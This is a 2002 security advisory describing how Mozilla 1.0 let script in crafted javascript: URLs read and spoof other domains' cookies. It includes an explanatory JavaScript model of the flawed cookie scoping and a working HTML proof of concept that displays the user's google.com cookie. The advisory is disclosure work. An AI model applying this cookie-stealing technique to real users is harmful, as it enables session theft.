COMMAND

Mozilla cookie can be stolen & spoofed

SYSTEMS AFFECTED

Mozilla 1.0

PROBLEM

Thanks to:

                _   _
               o' \,=./ `o
                  (o o)
Andreas Sandblad [sandblad@acc.umu.se], advisory [#9]
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

Credits to Ingesson, Quitta, Hawkan.

BACKGROUND:
===========

I originally thought this was an XSS (cross site scripting) issue, but soon came to the conclusion that it is limited to a design error in restricting access to cookies. Even though Mozilla is open source, I have not been studying the source code in order to find and exploit the vulnerability.

In the beginning I had problems not generating any javascript errors when using the javascript URL. My first solution was to make the host and path be a valid javascript expression. Google.com may be a valid expression if google is an object and com is an element/variable of the Google object. Further on, if Google.com is an int, it is legal to use google.com/ 1. Parsing of host and path will stop when a space is found.

Well, I soon found a much easier solution. Simply put a // in front of the host and path and a \n before the cookie reading code occurs. The reason why I didn't find this directly was because the newline must be created in a javascript function. It can't be set directly in a javascript URL.

DESCRIPTION:
============

Mozilla allows script run through the javascript: protocol to set and read cookies. For javascript: URLs the host and path used for cookie scoping are pulled out of the URL itself, as if it were:

    javascript:[host][path]

Cookie security is based only on restricting access to a correctly matching host and path; nothing checks that a javascript: URL can actually belong to that host. By carefully crafting a malicious javascript: URL and opening it in a new frame/iframe/window, it is possible to access and alter cookies from other domains.

DETAILS:
========

The easiest way to exploit the vulnerability is to simply create a javascript: URL in a javascript function as:

    javascript://[host]/[path]\n[code to read cookie]

The browser takes [host] and [path] as the cookie scope, while the script engine sees "//[host]/[path]" as a line comment, so the host and path don't generate any javascript errors. The newline ends the comment, and the cookie reading code on the next line is what actually runs, with the cookies of [host] in reach.
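To make the rule above concrete, here is an added example that is not code from the advisory or from Mozilla. It models, in plain JavaScript, the flawed scoping the advisory describes (host and path lifted out of the javascript: URL), shows why the "//host/path\n" trick evaluates without errors while a bare "host/path" does not, and contrasts it with a policy that gives a javascript: URL no scope of its own. The function names, the cookie jar and the simplified domain/path matching are this example's own assumptions; the hardened policy is the author of this example's suggestion, not Mozilla's actual patch.

```javascript
// Added example (not the advisory's or Mozilla's code): model of how a
// javascript: URL was scoped for cookie access, and why the payload works.
// Names, cookie data and the matching rules below are this example's own.

// Model of the flawed rule "javascript:[host][path]": after the scheme (and an
// optional "//"), host runs up to the first "/" or whitespace, path up to the
// first whitespace. Whatever follows is ignored for scoping.
function vulnerableCookieScope(url) {
  if (!/^javascript:/i.test(url)) return null;
  let rest = url.slice("javascript:".length);
  if (rest.startsWith("//")) rest = rest.slice(2);
  const m = /^([^\/\s]*)(\/[^\s]*)?/.exec(rest);
  return { host: m[1].toLowerCase(), path: m[2] || "/" };
}

// Simplified cookie store (constructed sample data). A scope may read a cookie
// when its host equals the cookie's domain or is a subdomain of it, and its
// path starts with the cookie's path.
const COOKIE_JAR = [
  { name: "PREF", value: "ID=deadbeef", domain: "google.com",   path: "/" },
  { name: "sess", value: "abc123",      domain: "bank.example", path: "/account" },
];

function cookiesVisibleTo(scope, jar = COOKIE_JAR) {
  if (!scope) return [];
  return jar
    .filter(c => (scope.host === c.domain || scope.host.endsWith("." + c.domain))
              && scope.path.startsWith(c.path))
    .map(c => `${c.name}=${c.value}`);
}

// The payload as the advisory builds it inside a script function: the "\n"
// must be a real newline, which is why it cannot be typed into the URL bar.
function buildPayload(host, code) {
  return "javascript://" + host + "/\n" + code;
}

// What the script engine evaluates: "//www.google.com/" is a line comment, so
// only the second line runs. A javascript: URL whose script yields a string
// replaces the document with that string (the advisory's real payload is a
// <body onload=alert(document.cookie)> string; a plain string is used here so
// the example runs outside a browser).
function evaluateJavascriptUrl(url) {
  const src = url.slice("javascript:".length);
  return (0, eval)(src);          // indirect eval: value of the last expression
}

// Hardened policy (this example's suggestion, not Mozilla's patch): a
// javascript: URL names no server, so it gets no scope from its text; the
// caller must use the origin of the document that navigated to it. Real URLs
// are scoped from their parsed host and path as before.
function safeCookieScope(url, navigatorScope) {
  if (/^javascript:/i.test(url)) return navigatorScope;
  const u = new URL(url);
  return { host: u.hostname.toLowerCase(), path: u.pathname || "/" };
}

// Stand-alone demo: attacker page at attacker.example opens the crafted URL.
function demo() {
  const attacker = { host: "attacker.example", path: "/" };
  const url = buildPayload("www.google.com", "'<b>stolen</b>'");
  return {
    vulnerable: cookiesVisibleTo(vulnerableCookieScope(url)),   // google cookie leaks
    hardened:   cookiesVisibleTo(safeCookieScope(url, attacker)), // nothing
    document:   evaluateJavascriptUrl(url),                      // "<b>stolen</b>"
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo());
}
```

The model also reproduces the author's earlier trick: `vulnerableCookieScope("javascript:google.com/ 1")` scopes to host google.com, path "/", because parsing stops at the space, while the script engine reads `google.com/ 1` as a division.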
EXPLOIT:
========

Instructions: Put the exploit in an HTML document on a remote server and load it with your Mozilla browser to activate the exploit.

-------------------------- CUT HERE ----------------------------
<pre>
Title:   Mozilla cookie stealing/spoofing
Date:    [2002-07-24]
Impact:  Steal/spoof arbitrary cookie                    _   _
         using javascript: URLs                         o' \,=./ `o
Author:  Andreas Sandblad, sandblad@acc.umu.se             (o o)
---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

This demo will display your google cookie (must exist).
</pre>

<body onload=init()>
<iframe name=f height=0 width=0 style=visibility:hidden></iframe>
<script>
function init(){
  // "//www.google.com/" is the cookie scope to the browser and a comment to
  // the script engine; the real newline ends the comment and the string on the
  // next line becomes the frame's document, with google.com cookies in scope.
  f.location = "javascript://www.google.com/\n"+
               "'<body onload=alert(document.cookie)>'";
}
</script>
-------------------------- CUT HERE ----------------------------

SOLUTION

Patch
=====

The author has been working with Mozilla to produce a patch. The problem is fixed in Mozilla 1.1 Beta, released 2002-07-22.

Workaround
==========

In Preferences->Advanced->Scripts & Plugins, disable access to cookies using javascript. Note that this switches off script access to document.cookie for every page, not only for javascript: URLs, so sites that rely on script reading or setting cookies will stop working until you upgrade.